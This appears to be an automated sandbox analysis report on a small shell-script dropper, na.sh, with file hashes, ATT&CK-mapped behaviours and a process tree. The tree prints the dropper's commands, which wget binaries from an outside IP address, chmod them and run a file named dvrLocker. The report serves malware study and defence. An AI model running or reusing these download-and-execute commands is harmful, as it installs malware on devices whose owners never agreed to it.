Analysis
-
max time kernel
150s -
max time network
133s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
10-10-2024 07:02
Static task
static1
Behavioral task
behavioral1
Sample
na.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
na.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
na.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
na.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
na.sh
-
Size
372B
-
MD5
6b2644c0adca68c54a53a79842eb3b3c
-
SHA1
d26ec0f0fc70fcb713aba5fa56912809cefb8bc0
-
SHA256
89e3309d765c4f00090a446b6599b23a3d2334aec380f52cb7d9c89da2683e6f
-
SHA512
943667c0ddec5ed4ec3a8d66d8997078a9b04f3b48b937f5e3b339f039d53c495a27a3253c504edc22704c394bb197455ace2e1c45e17eeda806b3b4200fb90c
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodpid Process 724 chmod 734 chmod 740 chmod 750 chmod 760 chmod -
Deletes itself 1 IoCs
Processes:
dvrLockerpid Process 736 dvrLocker -
Executes dropped EXE 5 IoCs
Processes:
dvrLockerdvrLockerdvrLockerdvrLockerdvrLockerioc pid Process /dvrLocker 726 dvrLocker /dvrLocker 736 dvrLocker /dvrLocker 747 dvrLocker /dvrLocker 753 dvrLocker /dvrLocker 762 dvrLocker -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 208.67.222.222 -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads process memory 1 TTPs 4 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
Processes:
dvrLockerdescription ioc Process File opened for reading /proc/673/maps dvrLocker File opened for reading /proc/674/maps dvrLocker File opened for reading /proc/374/maps dvrLocker File opened for reading /proc/376/maps dvrLocker -
Changes its process name 1 IoCs
Processes:
dvrLockerdescription pid Process Changes the process name, possibly in an attempt to hide itself 736 dvrLocker -
Processes:
dvrLockerdescription ioc Process File opened for reading /proc/1269/status dvrLocker File opened for reading /proc/744/cmdline dvrLocker File opened for reading /proc/883/cmdline dvrLocker File opened for reading /proc/1047/cmdline dvrLocker File opened for reading /proc/1113/cmdline dvrLocker File opened for reading /proc/1131/cmdline dvrLocker File opened for reading /proc/1298/cmdline dvrLocker File opened for reading /proc/1359/cmdline dvrLocker File opened for reading /proc/111/cmdline dvrLocker File opened for reading /proc/1008/cmdline dvrLocker File opened for reading /proc/1023/cmdline dvrLocker File opened for reading /proc/1006/cmdline dvrLocker File opened for reading /proc/1064/cmdline dvrLocker File opened for reading /proc/1181/cmdline dvrLocker File opened for reading /proc/1465/status dvrLocker File opened for reading /proc/802/cmdline dvrLocker File opened for reading /proc/808/cmdline dvrLocker File opened for reading /proc/864/cmdline dvrLocker File opened for reading /proc/1050/cmdline dvrLocker File opened for reading /proc/1358/cmdline dvrLocker File opened for reading /proc/782/cmdline dvrLocker File opened for reading /proc/856/cmdline dvrLocker File opened for reading /proc/1043/cmdline dvrLocker File opened for reading /proc/1182/cmdline dvrLocker File opened for reading /proc/1206/cmdline dvrLocker File opened for reading /proc/867/cmdline dvrLocker File opened for reading /proc/1021/cmdline dvrLocker File opened for reading /proc/1042/cmdline dvrLocker File opened for reading /proc/977/cmdline dvrLocker File opened for reading /proc/1028/cmdline dvrLocker File opened for reading /proc/1154/cmdline dvrLocker File opened for reading /proc/845/cmdline dvrLocker File opened for reading /proc/929/cmdline dvrLocker File opened for reading /proc/943/cmdline dvrLocker File opened for reading /proc/954/cmdline dvrLocker File opened for reading /proc/1110/cmdline dvrLocker File opened for reading /proc/36/cmdline dvrLocker File opened for reading /proc/374/cmdline dvrLocker File opened for reading /proc/812/cmdline dvrLocker File opened for reading /proc/1249/cmdline dvrLocker File opened for reading /proc/917/cmdline dvrLocker File opened for reading /proc/1005/cmdline dvrLocker File opened for reading /proc/1168/cmdline dvrLocker File opened for reading /proc/1192/cmdline dvrLocker File opened for reading /proc/1420/cmdline dvrLocker File opened for reading /proc/12/cmdline dvrLocker File opened for reading /proc/842/cmdline dvrLocker File opened for reading /proc/911/cmdline dvrLocker File opened for reading /proc/791/cmdline dvrLocker File opened for reading /proc/800/cmdline dvrLocker File opened for reading /proc/835/cmdline dvrLocker File opened for reading /proc/850/cmdline dvrLocker File opened for reading /proc/1250/cmdline dvrLocker File opened for reading /proc/21/cmdline dvrLocker File opened for reading /proc/695/cmdline dvrLocker File opened for reading /proc/766/cmdline dvrLocker File opened for reading /proc/1330/cmdline dvrLocker File opened for reading /proc/1419/cmdline dvrLocker File opened for reading /proc/798/cmdline dvrLocker File opened for reading /proc/1072/cmdline dvrLocker File opened for reading /proc/1162/cmdline dvrLocker File opened for reading /proc/806/cmdline dvrLocker File opened for reading /proc/934/cmdline dvrLocker File opened for reading /proc/976/cmdline dvrLocker -
System Network Configuration Discovery 1 TTPs 1 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
na.shdescription ioc Process File opened for modification /tmp/0 na.sh
Processes
-
/tmp/na.sh/tmp/na.sh1⤵
- Writes file to tmp directory
PID:703 -
/bin/rmrm -rf dvrLocker2⤵PID:705
-
-
/usr/bin/wgetwget http://185.157.247.125/c/empsl -O -2⤵PID:706
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:724
-
-
/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:726
-
-
/usr/bin/wgetwget http://185.157.247.125/c/emips -O -2⤵
- System Network Configuration Discovery
PID:728
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:734
-
-
/dvrLocker./dvrLocker tplink.new2⤵
- Deletes itself
- Executes dropped EXE
- Reads process memory
- Changes its process name
- Reads runtime system information
PID:736
-
-
/usr/bin/wgetwget http://185.157.247.125/c/earm -O -2⤵PID:738
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:740
-
-
/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:747
-
-
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:747
-
-
/usr/bin/wgetwget http://185.157.247.125/c/earm7 -O -2⤵PID:749
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:750
-
-
/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:753
-
-
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:753
-
-
/usr/bin/wgetwget http://185.157.247.125/c/ex86 -O -2⤵PID:759
-
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:760
-
-
/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:762
-
-
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:762
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
41KB
MD53cfc76868e26201ac03e0583b7c8aaba
SHA103436d9d090e1f944fecf60adc1e45f90df20c26
SHA2568c825ecd4fff08b44d8334e022dc0d6eedbe9a1b61469e523025d7968be2e84d
SHA51284add49907a7c8818abc31118e16e8becf3bb41bcf814139fe0c99617b9ff46dc228be8a319e3fd80f0a672bc056cb30bb75ff0a4ed03418cd06cc95ef5070b2
-
Filesize
40KB
MD5c0b34d8a59f793b636b5424b8e96a64a
SHA1d5eac6c7b3a5953ffcd642de9db2cd1c45463e96
SHA256defb122644753c1493b140e9bb7b6df824197a475f39af66f50ae93190e43270
SHA51257446ac19971a42d6dc72b0ce14e7771efed16b9da6b86102ec4540cdc16103557e48eb957a822543d825cada502700d8f225d4b47d93c5e43e7fd8c55ba25d4